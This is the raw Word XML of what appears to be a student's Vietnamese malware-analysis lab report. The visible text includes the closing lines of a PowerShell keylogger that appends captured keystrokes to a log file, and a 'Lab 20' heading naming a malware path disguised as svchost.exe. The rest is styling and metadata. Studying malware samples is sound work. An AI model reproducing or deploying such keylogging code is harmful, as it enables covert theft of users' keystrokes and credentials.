          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    if ($success)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D0F829" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD365A" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        # add key to logger file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AB0564" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFAC058" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB1C2E9" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108F67C6" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688CC59C" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B85D1BA" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CBC787" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    finally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB262BB" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39826DDC" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD672A" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2B92B9" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E6310B" w14:textId="17A5BFD8" w:rsidR="00F853D8" w:rsidRDefault="00F853D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Lab 20:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDCE8FB" w14:textId="3637332B" w:rsidR="00F853D8" w:rsidRPr="002B7E7C" w:rsidRDefault="00C53D2E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Mã độc: “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53D2E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>C:\Users\hunter\AppData\Roaming\WPDNSE\svchost.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F853D8" w:rsidRPr="002B7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DC"/>
    <w:rsid w:val="00064775"/>
    <w:rsid w:val="000A4132"/>
    <w:rsid w:val="000C40AF"/>
    <w:rsid w:val="00115087"/>
    <w:rsid w:val="00131CE5"/>
    <w:rsid w:val="00211894"/>
    <w:rsid w:val="00251026"/>
    <w:rsid w:val="0026725D"/>
    <w:rsid w:val="002B7E7C"/>
    <w:rsid w:val="00447F68"/>
    <w:rsid w:val="00464E32"/>
    <w:rsid w:val="00480AC2"/>
    <w:rsid w:val="00575176"/>
    <w:rsid w:val="00594754"/>
    <w:rsid w:val="00667416"/>
    <w:rsid w:val="006C3FF5"/>
    <w:rsid w:val="007A552F"/>
    <w:rsid w:val="00976930"/>
    <w:rsid w:val="00992526"/>
    <w:rsid w:val="00997B40"/>
    <w:rsid w:val="009B1410"/>
    <w:rsid w:val="009D544B"/>
    <w:rsid w:val="009D7CD7"/>
    <w:rsid w:val="00A3740B"/>
    <w:rsid w:val="00A86E70"/>
    <w:rsid w:val="00AC7285"/>
    <w:rsid w:val="00AC73D6"/>
    <w:rsid w:val="00B35116"/>
    <w:rsid w:val="00B73ED9"/>
    <w:rsid w:val="00B817E7"/>
    <w:rsid w:val="00BC2DAF"/>
    <w:rsid w:val="00C53D2E"/>
    <w:rsid w:val="00CA529F"/>
    <w:rsid w:val="00CD1EFC"/>
    <w:rsid w:val="00D27E02"/>
    <w:rsid w:val="00DA139E"/>
    <w:rsid w:val="00DA5F38"/>
    <w:rsid w:val="00EC4F29"/>
    <w:rsid w:val="00F02CDC"/>
    <w:rsid w:val="00F72F23"/>
    <w:rsid w:val="00F745B4"/>
    <w:rsid w:val="00F853D8"/>
    <w:rsid w:val="00F94058"/>
    <w:rsid w:val="00FC7C3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54F3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{875C446C-FDA8-4868-BB30-81A498A8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02CDC"/>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F02CDC"/>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F02CDC"/>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F02C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2C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2C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2C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2C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2C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CDC"/>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F02CDC"/>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F02CDC"/>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F02C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2C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2C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2C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2C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2CDC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00F02CDC"/>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02CDC"/>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F02CDC"/>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F02CDC"/>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F02CDC"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00F02CDC"/>
    <w:rPr>
      <w:rFonts w:cs="Mangal"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F02CDC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00F02CDC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00F02C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2CDC"/>
    <w:rPr>
      <w:rFonts w:cs="Mangal"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00F02CDC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="002672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A4C3-5C0A-4686-BC31-8B613A7F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14</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Hung 20225545</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyen Quang Hung 20225545</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-08T04:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-17T07:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>